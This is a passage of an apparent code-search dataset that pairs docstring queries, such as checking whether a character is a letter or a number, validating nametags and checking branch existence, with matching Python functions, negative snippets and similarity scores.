rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def red_channel(img):\n\n red = np.zeros(img.shape,dtype=float)\n\n red[:,:,2] = np.copy(img[:,:,2])\n\n return red", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def yuv2rgb(im):\n ## conflicting definitions exist depending on whether you use the full range\n ## of YCbCr or clamp out to the valid range. see here\n ## http://www.equasys.de/colorconversion.html\n ## http://www.fourcc.org/fccyvrgb.php\n from numpy import dot, ndarray, array\n # if not im.dtype == 'uint8':\n # raise ImageUtilsError('yuv2rgb only implemented for uint8 arrays')\n\n ## better clip input to the valid range just to be on the safe side\n yuv = ndarray(im.shape) ## float64\n yuv[:, :, 0] = im[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = im[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n ## ITU-R BT.601 version (SDTV)\n A = array([[1., 0., 0.701],\n [1., -0.886 * 0.114 / 0.587, -0.701 * 0.299 / 0.587],\n [1., 0.886, 0.]])\n A[:, 0] *= 255. / 219.\n A[:, 1:] *= 255. / 112.\n\n ## ITU-R BT.709 version (HDTV)\n # A = array([[1.164, 0., 1.793],\n # [1.164, -0.213, -0.533],\n # [1.164, 2.112, 0.]])\n\n rgb = dot(yuv, A.T)\n return rgb.clip(0, 255).astype('uint8')", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)" ]
[ "0.7471666", "0.7259688", "0.7216436", "0.6839209", "0.6759264", "0.67525685", "0.67007047", "0.6603421", "0.6600922", "0.6595562", "0.6580605", "0.6568346", "0.6499439", "0.64541537", "0.64526325", "0.6431422", "0.63929", "0.6372881", "0.63197166", "0.6308842", "0.63075536", "0.62842566", "0.6284198", "0.62655497", "0.6263118", "0.6215577", "0.6208403", "0.6144289", "0.6131233", "0.6115102" ]
0.7765698
0
Checks if the given character is a letter.
def is_letter(c): return 'A' <= c <= 'Z' or 'a' <= c <= 'z'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_letter(string_):\n if string_ not in string.ascii_letters or len(string_) > 1:\n return False\n return True", "def isLetter(c):\n ret = libxml2mod.xmlIsLetter(c)\n return ret", "def is_letter(user_input):\n # If any characters is letter -> return boolean True else False\n if any(char.isalpha() for char in user_input):\n return True\n return False", "def has_letter(word):\r\n for char in word:\r\n if char.isalpha():\r\n return True\r\n return False", "def __valid_char(self, char: str) -> bool:\r\n if char.isdigit():\r\n raise ValueError('Characters can\\'t be numbers')\r\n\r\n return char.isalpha() or char.isspace()", "def character(x):\n if (x==\"a\"or x==\"A\"or x==\"e\"or x==\"E\"or x==\"i\"or x==\"I\"or x==\"o\"or x==\"O\"or x==\"u\"or x==\"U\"):\n return('True')\n else:\n return('False')", "def isSingleLetter(self, word):\n return (re.match('^\\w$', word)) != None", "def is_lowercase(character):\n return 'a' <= character <= 'z'", "def isalpha(self) -> bool:\n pass", "def is_uppercase(character):\n return 'A' <= character <= 'Z'", "def isChar(ch):\n ret = libxml2mod.xmlIsChar(ch)\n return ret", "def is_allowed_char(ch):\n\treturn ch.isalnum() or ch in \"#.>+*:$-_!@\"", "def isAlpha(string):\n return (True)", "def is_valid_input(guess_letter):\r\n length = len(guess_letter)\r\n\r\n if length > 1 and not guess_letter.isalpha():\r\n return False\r\n elif not guess_letter.isalpha():\r\n return False\r\n elif length > 1:\r\n return False\r\n else:\r\n return True", "def test_starts_letter(x):\n return x[0].isalpha()", "def is_valid_char(src):\n\n return src.isalnum()", "def must_contain_letter(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"[a-zA-Z]\", str(cell)))", "def isAlphanum(c):\r\n return ((c >= 'a' and c <= 'z') or (c >= '0' and c <= '9') or\r\n (c >= 'A' and c <= 'Z') or c == '_' or c == '$' or c == '\\\\' or (c is not None and ord(c) > 126));", "def ishex(char: chr) -> bool:\n return char.isdigit() or char in \"abcdef\"", "def _is_alpha(argument):\n\n if not isinstance(argument, str):\n return False\n\n if argument.lower() == 'alpha':\n is_alpha = True\n else:\n argument, Z = _extract_charge_state(argument)\n\n if Z != 2:\n is_alpha = False\n elif argument[-2:] != '-4':\n is_alpha = False\n else:\n\n dash_position = argument.find('-')\n argument = argument[:dash_position]\n\n if argument.lower() == 'helium' or argument == 'He':\n is_alpha = True\n else:\n is_alpha = False\n\n return is_alpha", "def if_letter(letter):\r\n str_abc= ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n answer= False\r\n for i in range(len(str_abc)):\r\n if letter==str_abc[i]:\r\n answer=True\r\n return answer", "def isalpha(self):\n return isalpha(self)", "def is_word_character(ch):\n if (ch >= 'a' and ch <= 'z'): return True\n if (ch >= 'A' and ch <= 'Z'): return True\n if (ch >= '0' and ch <= '9'): return True\n if (ch >= 'À' and ch < 'ˀ'): return True\n if (ch == '-' or ch == '0xAD'): return True # hyphen or soft hyphen\n if (ch >= 'Ά' and ch <= 'ԓ'): return True\n return False", "def check_type(character: str):\n if character.isupper():\n return 'upper'\n elif character.islower():\n return 'lower'\n elif character.isspace():\n return 'space'\n elif character in string.punctuation:\n return 'punc'\n else:\n return 'digit'", "def check_type(character: str):\n if character.isupper():\n return 'upper'\n elif character.islower():\n return 'lower'\n elif character.isspace():\n return 'space'\n elif character in string.punctuation:\n return 'punc'\n else:\n return 'digit'", "def is_valid_alphabetical_string(string_object: str):\n return string_object.isalpha()", "def checkLetter():\n\tguess = False\n\twhile guess != True:\n\t\tguess = str(raw_input(\"Guess a letter: \"))\n\t\tif guess.isalpha() and len(guess) == 1 :\n\t\t\treturn guess\n\t\telif not guess.isalpha() or len(guess) > 1:\n\t\t\tprint \"The input may be one letter only!\"\n\t\telse:\n\t\t\tprint \"Error in checkLetter\"", "def test_ends_letter(x):\n return x[-1].isalpha()", "def contains_only_char(s, char):\n for c in s:\n if c != char:\n return False\n return True", "def name_valid(name):\n return name.isalpha()" ]
[ "0.8101875", "0.7942589", "0.77772945", "0.7760421", "0.7488684", "0.7349609", "0.7162389", "0.7131679", "0.7119435", "0.71050584", "0.7094554", "0.70823413", "0.70609343", "0.7013201", "0.69936603", "0.69796395", "0.6963873", "0.6928611", "0.6889942", "0.68720996", "0.68349135", "0.68182826", "0.6767468", "0.67518854", "0.6746451", "0.6743348", "0.6732877", "0.66436744", "0.66269696", "0.6549778" ]
0.84225947
0
Checks if the given character is a number.
def is_number(c): return '0' <= c <= '9'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_num_char(x):\n return ord('0') <= ord(x) <= ord('9')", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def _is_number(self, symbol):\n if symbol.type == self.scanner.NUMBER:\n return True\n else:\n return False", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def isdigit(self):\n return isdigit(self)", "def isDigit(ch):\n ret = libxml2mod.xmlIsDigit(ch)\n return ret", "def string_is_digit(string):\n valids = set([46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57])\n plus_minus = set([43, 45])\n characters = list(string)\n\n #First character can be number or +/-\n if ord(characters[0]) not in valids.union(plus_minus):\n return False\n \n #Iterate to check all other characters\n for character in string[1:]:\n value = ord(character)\n if value not in valids:\n return False\n elif value == 46: # 46 = '.'\n valids.remove(46) # Only one period allowed\n return True", "def isdigit(self) -> bool:\n pass", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 0\n else:\n return 1", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n else:\n return False", "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False" ]
[ "0.8297935", "0.80840826", "0.7704204", "0.76546836", "0.75744826", "0.7568717", "0.7393754", "0.73098946", "0.7302559", "0.7258665", "0.72420657", "0.7230359", "0.7195663", "0.71815383", "0.7179277", "0.7152408", "0.71477836", "0.71332264", "0.71325856", "0.71297145", "0.7120026", "0.7101", "0.71002775", "0.7066229", "0.70618486", "0.703624", "0.703624", "0.703624", "0.7029543", "0.69642216" ]
0.82398206
1
Checks if the given nametag is valid, that it only contains letters, numbers, dashes, underscores and apostrophes. It must also start with the given tags in `Tags.py `. And returns the nametag if it is valid.
def get_nametag(nametag): # start must be valid if not nametag.startswith(Tags.NAMETAG_START.value): return None # removes the start of the tag nametag = nametag[len(Tags.NAMETAG_START.value):] # end must be valid if not nametag.endswith(Tags.NAMETAG_END.value): return None # removes the end of the tag nametag = nametag[:(len(nametag) - len(Tags.NAMETAG_END.value))] # no empty nametags if nametag == "": return None # checks that every single character is valid for c in nametag: if (not is_letter(c) and not is_number(c) and c != "-" and c != "_" and c != "'"): return None return nametag
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isValidTagName(s):\n if s.lower().startswith(\"xml\"):\n return False\n return re.match(\"[^\\W\\d][\\w\\-_.]*\", s)", "def name_valid(name):\n return name.isalpha()", "def validname(name):\r\n return len(name)>0 and (\r\n Context.__invalid_character.search(name) is None)", "def validName(varname):\r\n if (len(varname[0])>32):\r\n return False\r\n if not(varname[0][0].isalpha()):\r\n return False \r\n for ch in varname[0][1:]:\r\n if not(ch.isalpha() or ch.isdigit() or ch=='_'):\r\n return False\r\n \r\n return True", "def invalid_name(name):\n if any(not item.isalpha() for item in str(name)):\n return True\n return False", "def validate_name(name:str) -> bool:\r\n return name.isalpha() and name.count(\" \") == 0 and len(name) >= 2", "def validate_names(name):\n return isinstance(name, str) and not re.search(r'[\\s]', name)", "def _is_valid_varname(self, name):\n if name in RESERVED or re.match(r'^str([0-9]+|L)$', name): return False\n return True if VALID_NAME_RE.match(name) else False", "def _is_valid_varname(self, name):\n if name in RESERVED or re.match(r'^str[0-9]+$', name): return False\n return True if VALID_NAME_RE.match(name) else False", "def validate_name(self, name):\n import re\n\n if not re.findall(\"^[\\w',]+$\", name):\n self.msg(\"That category name contains invalid characters.\")\n return False\n return True", "def validateName(name):\r\n if not name:\r\n raise IllegalName('Name can not be an empty string.')\r\n\r\n m = _NAME_RE.match(name)\r\n\r\n if m is None or m.group(0) != name:\r\n raise IllegalName('Name has to start with a letter followed by an '\r\n 'arbitrary number of alphanumeric characters or '\r\n 'underscores.')", "def _clean_tag(name):\n # In the past, the first argument to summary ops was a tag, which allowed\n # arbitrary characters. Now we are changing the first argument to be the node\n # name. This has a number of advantages (users of summary ops now can\n # take advantage of the tf name scope system) but risks breaking existing\n # usage, because a much smaller set of characters are allowed in node names.\n # This function replaces all illegal characters with _s, and logs a warning.\n # It also strips leading slashes from the name.\n if name is not None:\n new_name = _INVALID_TAG_CHARACTERS.sub('_', name)\n new_name = new_name.lstrip('/') # Remove leading slashes\n if new_name != name:\n logging.warning('Summary name %s is illegal; using %s instead.', name, new_name)\n name = new_name\n return name", "def _check_is_name_valid(self, name):\n if name in self.forbidden_names or name.endswith(\n self.forbidden_extensions) or self.__check_is_match_regex(name):\n return False\n return True", "def IsVPCNameValid(vpc):\n if len(vpc) < 1 or len(vpc) > 63:\n return False\n return bool(re.match('^[a-z]$|^[a-z][a-z0-9-]*[a-z0-9]$', vpc))", "def validate_name(name):\n name = name.strip()\n m = re.search('^[a-zA-Z0-9 ]{3,30}$', name)\n if m is None:\n return False\n else:\n return True", "def CHECK_NAME(name):\n if WORDPAT.match(name):\n return name\n return None", "def _filter_name(name):\n # Remove if length 3 or less\n if len(name) <= 3:\n return False\n # Remove if starts with IL-\n if name.startswith('IL-'):\n return False\n lowname = name.lower()\n # Remove if contains certain sequences\n if any(c in lowname for c in STOP_SUB):\n return False\n # Remove if (case-insensitive) exact match to stoplist\n if lowname in STOPLIST:\n return False\n comps = re.split('[ -]', lowname)\n # Remove if just single character + digits separated by spaces or hyphens (or the word compound)\n if all(c.isdigit() or len(c) == 1 or c == 'compound' for c in comps):\n return False\n # Remove if 3 or fewer letters with 2 or fewer digits\n if len(comps) == 2 and len(comps[0]) <= 3 and comps[0].isalpha() and len(comps[1]) <= 3 and comps[1].isdigit():\n return False\n # Remove if just greek characters and numbrs\n if re.match('^[Α-Ωα-ω0-9]+$', name):\n return False\n # Filter registry numbers? No real size benefit in DAWG.\n # if REG_RE.search(name):\n # keep = False\n # Handle this at the token level\n # if name.endswith(' derivative') or name.endswith(' analog') or name.endswith(' solution'):\n # keep = False\n # Filter this after matching and expanding boundaries\n # if name.startswith('-') or name.endswith('-'):\n # keep = False\n # Filter this after matching and expanding boundaries\n # if not bracket_level(name) == 0:\n # print(name)\n return True", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def MakeValidName(name):\n if name:\n goodName = []\n if not xml.is_name_start_char(name[0]):\n goodName.append(u'_')\n for c in name:\n if xml.is_name_char(c):\n goodName.append(c)\n else:\n goodName.append(u'_')\n return string.join(goodName, u'')\n else:\n return u'_'", "def check_valid_key_name(name):\n if type(name) not in [str]:\n return False\n bad_chars = [\"*\", \".\", \"&&&&\"]\n for k in bad_chars:\n if k in name:\n return False\n return True", "def match(self, name, tags):\n return name.lower() in tags", "def validated_name(cls, name):\n if (name[:5] == 'hive-'\n and name[5] in ['1', '2', '3']\n and re.match(r'^hive-[123]\\d{4,6}$', name)):\n return name\n return None", "def isValidPart(name):\n\tfor n in name_forms:\n\t\tif re.match(n, name.lower()) is not None:\n\t\t\treturn True\n\treturn False", "def legal_name(name, is_param_name=False):\n if name.startswith('_'):\n return False\n\n if name in ('self',):\n return False\n\n if keyword.iskeyword(name):\n return False\n\n regex = r'^[a-zA-Z][a-zA-Z0-9_]*$' if is_param_name else (\n r'^[a-zA-Z][.\\w-]*$')\n return bool(re.match(regex, name))", "def validate_team_name(name):\n if not re.match('^[A-Za-z0-9_]*$', name):\n print('INVALID NAME. LETTERS, NUMBERS AND UNDERSCORES ONLY')\n return False\n elif len(name) > 10:\n print('INVALID NAME. 10 CHARACTERS MAX')\n return False\n elif len(name) == 0:\n print('INVALID NAME. NOT LONG ENOUGH')\n else:\n return True", "def check_name(name):\n name = sanitize_name(name)\n for letter in name:\n if letter not in all_letters:\n # print(f\"Bad letter = {letter}\")\n return False\n role = extract_role(name)\n # remove group\n name = name.replace(f' - {role}', '')\n try:\n parts = name.split(' ')\n firstname = parts[0].title()\n if firstname[0] not in letters:\n return False\n for letter in firstname[1:]:\n if letter not in LETTERS:\n return False\n familynames = parts[1:]\n for familyname in familynames:\n if familyname[0] not in letters:\n return False\n for letter in familyname[1:]:\n if letter not in LETTERS:\n return False\n return True\n except:\n return False", "def clean_name(self):\n name = self.cleaned_data['name']\n if not re.match(r'[\\w{4}\\s*]+', name) or len(name) < 4:\n v_err('no_name')\n return name", "def validate_tag(tag=None):\n if not tag:\n raise AttributeError('Tag cannot be empty')\n\n if tag not in TAGS:\n raise ValueError('{0} tag is not supported')", "def isValidName(theString, minimum, maximum) :\n\n return theString.isalpha() == True \\\n and len(theString) >= minimum \\\n and len(theString) <= maximum", "def is_real_name(name):\n return name.strip(\"<> \") in names_set" ]
[ "0.7056981", "0.6984154", "0.6797562", "0.65576094", "0.65357757", "0.6507386", "0.6452223", "0.63574183", "0.6310293", "0.6288627", "0.62855893", "0.6240301", "0.62214375", "0.61912215", "0.6171858", "0.615459", "0.61444604", "0.6139254", "0.6049716", "0.6022824", "0.59896547", "0.5982377", "0.5968032", "0.5958874", "0.5951548", "0.59489644", "0.59308624", "0.59254557", "0.5904121", "0.5901528" ]
0.7059107
0
Checks whether the given nametag is reachable by another branch or not. This means that the given nametag must appear in at least one branch as an end tag.
def is_nametag_reachable(nametag, branches): for branch in branches: for next_nametag in branches[branch].next_nametags: if next_nametag == nametag: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def valid_branches(branches):\n\n # for every branch in the list\n for branch in branches:\n\n # make sure it is either reachable or has the special tag \"start\"\n if branches[branch].name != \"start\" and not is_nametag_reachable(branches[branch].name, branches):\n return False\n\n # make sure all ending tags refer to existing branches\n for nametag in branches[branch].next_nametags:\n if not branch_exists(nametag, branches):\n return False\n\n return True", "def branch_exists(nametag, branches):\n for branch in branches:\n if branches[branch].name == nametag:\n return True\n return False", "def _is_branch(self, reference_name):\n return reference_name.startswith(\"refs/heads/\") or reference_name.startswith(\n \"refs/remotes/\"\n )", "def is_branch(wit_path, branch):\n\n branches = _get_references_data(wit_path)\n del branches['HEAD']\n return branch in branches.keys()", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def branch_exists(branch_name, local_only=False, directory=None):\n for branch in get_branches(local_only, directory):\n if branch.startswith('remotes/'):\n branch = branch.split('/')\n if len(branch) > 2:\n branch = '/'.join(branch[2:])\n if branch_name == branch:\n return True\n else:\n if branch_name == branch:\n return True\n return False", "def has_branch(self, branch):\n if self.branch == branch:\n return True\n return False", "def match(self, name, tags):\n return name.lower() in tags", "def is_tagged(self,tag_name,element):\n return (tag_name in self.tag2elements.keys()) and (element in self.tag2elements[tag_name])", "def check_component(comp_name: str, comp: defs.Component) -> None:\n if not RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)", "def is_subtag(tag_name, subtag_name, user_path, current_user) -> bool:\n user = current_user[0]\n subtag_list = os.listdir((user_path + '\\\\' + user + '\\\\' + tag_name).encode('unicode_escape'))\n temp = list(map(bytes.decode, subtag_list))\n\n if subtag_name + '.txt' in temp:\n return True\n else:\n return False", "def _is_desired_tag(self, tag):\n if self._tags is None:\n return True\n\n if self._ignore_namespace:\n for desired_tag in self._tags:\n if tag.localname == desired_tag.localname:\n return True\n else:\n for desired_tag in self._tags:\n if tag == desired_tag:\n return True\n\n return False", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def is_tag(tag_name, user_path, current_user) -> bool:\n user = current_user[0]\n tag_list = os.listdir((user_path + '\\\\' + user).encode('unicode_escape'))\n temp = list(map(bytes.decode, tag_list))\n if tag_name in temp:\n return True\n else:\n return False", "def verify_tag(tag):\n command = [\"git\", \"tag\", \"--points-at\"]\n with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:\n tag_str = proc.stdout.readline()\n return tag_str.decode(\"utf-8\").rstrip() == tag", "def test_bookmark_tag_complete(self):\r\n self._get_good_request(second_bmark=True)\r\n\r\n res = self.testapp.get(\r\n '/api/v1/admin/tags/complete',\r\n params={\r\n 'tag': 'py',\r\n 'api_key': API_KEY},\r\n status=200)\r\n\r\n self.assertTrue(\r\n 'python' in res.body,\r\n \"Should have python as a tag completion: \" + res.body)\r\n\r\n # we shouldn't get python as an option if we supply bookmarks as the\r\n # current tag. No bookmarks have both bookmarks & python as tags\r\n res = self.testapp.get(\r\n '/api/v1/admin/tags/complete',\r\n params={\r\n 'tag': u'py',\r\n 'current': u'bookmarks',\r\n 'api_key': API_KEY\r\n },\r\n status=200)\r\n\r\n self.assertTrue(\r\n 'python' not in res.body,\r\n \"Should not have python as a tag completion: \" + res.body)\r\n self._check_cors_headers(res)", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def branch_exists(branch):\n\n try:\n git('show-ref', branch)\n return True\n except subprocess.CalledProcessError:\n return False", "def is_remote_reserve_branch_present(repo):\n reserve_name = phlgitu_ref.Name(_RESERVE_BRANCH_FQ_NAME)\n remote_ref_names = repo(\"ls-remote\").split()[1::2]\n return reserve_name.fq in remote_ref_names", "def match(self, name, tags):\n name, tags = self.get_compiled(name, tags)\n \n def index_of_letter(l):\n return ord(l) - ord('a')\n \n true_val, false_val = name\n \n if true_val:\n return index_of_letter(true_val) in tags\n else:\n return index_of_letter(false_val) not in tags", "def bonenamematch(name1, name2):\n if name1 == name2:\n return True\n if name1.startswith(\"Bip01 L \"):\n name1 = \"Bip01 \" + name1[8:] + \".L\"\n elif name1.startswith(\"Bip01 R \"):\n name1 = \"Bip01 \" + name1[8:] + \".R\"\n if name2.startswith(\"Bip01 L \"):\n name2 = \"Bip01 \" + name2[8:] + \".L\"\n elif name2.startswith(\"Bip01 R \"):\n name2 = \"Bip01 \" + name2[8:] + \".R\"\n if name1 == name2:\n return True\n return False", "def match(self, name, tags):\n S, tags = self.get_compiled(name, tags)\n return bool(S & tags)", "def is_linguistic_tag(tag):\r\n if tag.startswith(\"&\"):\r\n return True\r\n if any(x in tag for x in [\"<abbr>\", \"<abbr \", \"</abbr>\"]):\r\n return True\r\n return False", "def git_checkout_branch(name):\n\n if subprocess.call([\"git\", \"diff\", \"--quiet\", \"HEAD\"]) != 0:\n raise Exception(\"Dirty working tree; not checking out %s\" % name)\n\n if subprocess.call([\"git\", \"checkout\", name]) != 0:\n raise Exception(\"Could not checkout %s\" % name)", "def local_branch_exists(self, branch):\n return branch in self.repo.branches", "def is_complete(self, A, B):\n return all(self.is_edge(v, w) for v in A for w in B)", "def _check_branch(opt, params):\n\n # Check the current branch and hash\n _get_branch(opt)\n\n if params.git_branch != opt.git_branch or params.git_hash != opt.git_hash:\n msg = 'You are not on the right branch or commit. Please run the following in the repository: \\n'\n msg += f'git checkout {params.git_branch}\\n'\n msg += f'git revert {params.git_hash}'\n sys.exit(msg)", "def mac_pool_exists(handle, name, assignment_order=None,\r\n r_from=None, to=None, descr=None, parent_dn=\"org-root\"):\r\n dn = parent_dn + '/mac-pool-' + name\r\n mo = handle.query_dn(dn)\r\n if mo:\r\n if ((assignment_order and mo.assignment_order != assignment_order) and\r\n (r_from and mo.r_from != r_from) and\r\n (to and mo.to != to) and\r\n (descr and mo.descr != descr)):\r\n return False\r\n return True\r\n return False", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def check_name(self, name: str):\n if name[0] == \"/\" or self.check_end_streaming(name):\n return True\n else:\n return False" ]
[ "0.6780454", "0.67798984", "0.61064994", "0.555332", "0.54905283", "0.5410261", "0.5404235", "0.5332533", "0.52437496", "0.52371407", "0.5203334", "0.5191445", "0.5187049", "0.5181029", "0.5169189", "0.51587147", "0.51385343", "0.5123286", "0.50983757", "0.50803226", "0.5074915", "0.5070328", "0.5064637", "0.5060143", "0.5053163", "0.5048199", "0.500991", "0.5005835", "0.4999374", "0.4996595" ]
0.79997444
0
Checks whether the given nametag is indeed labelling a branch.
def branch_exists(nametag, branches): for branch in branches: if branches[branch].name == nametag: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_nametag_reachable(nametag, branches):\n for branch in branches:\n for next_nametag in branches[branch].next_nametags:\n if next_nametag == nametag:\n return True\n return False", "def _is_branch(self, reference_name):\n return reference_name.startswith(\"refs/heads/\") or reference_name.startswith(\n \"refs/remotes/\"\n )", "def valid_branches(branches):\n\n # for every branch in the list\n for branch in branches:\n\n # make sure it is either reachable or has the special tag \"start\"\n if branches[branch].name != \"start\" and not is_nametag_reachable(branches[branch].name, branches):\n return False\n\n # make sure all ending tags refer to existing branches\n for nametag in branches[branch].next_nametags:\n if not branch_exists(nametag, branches):\n return False\n\n return True", "def is_branch(wit_path, branch):\n\n branches = _get_references_data(wit_path)\n del branches['HEAD']\n return branch in branches.keys()", "def has_branch(self, branch):\n if self.branch == branch:\n return True\n return False", "def _is_label(self) -> bool:\n return self.lines[self.counter].startswith(\"(\") and self.lines[\n self.counter\n ].endswith(\")\")", "def _is_label(self, words):\n if words[0] == 'label':\n if len(words) != 2:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_LABEL command.\".format(self._file_line))\n return True\n else:\n return False", "def is_label(self, label: str) -> bool:\n return label in self.is_label_of", "def branch_exists(branch):\n\n try:\n git('show-ref', branch)\n 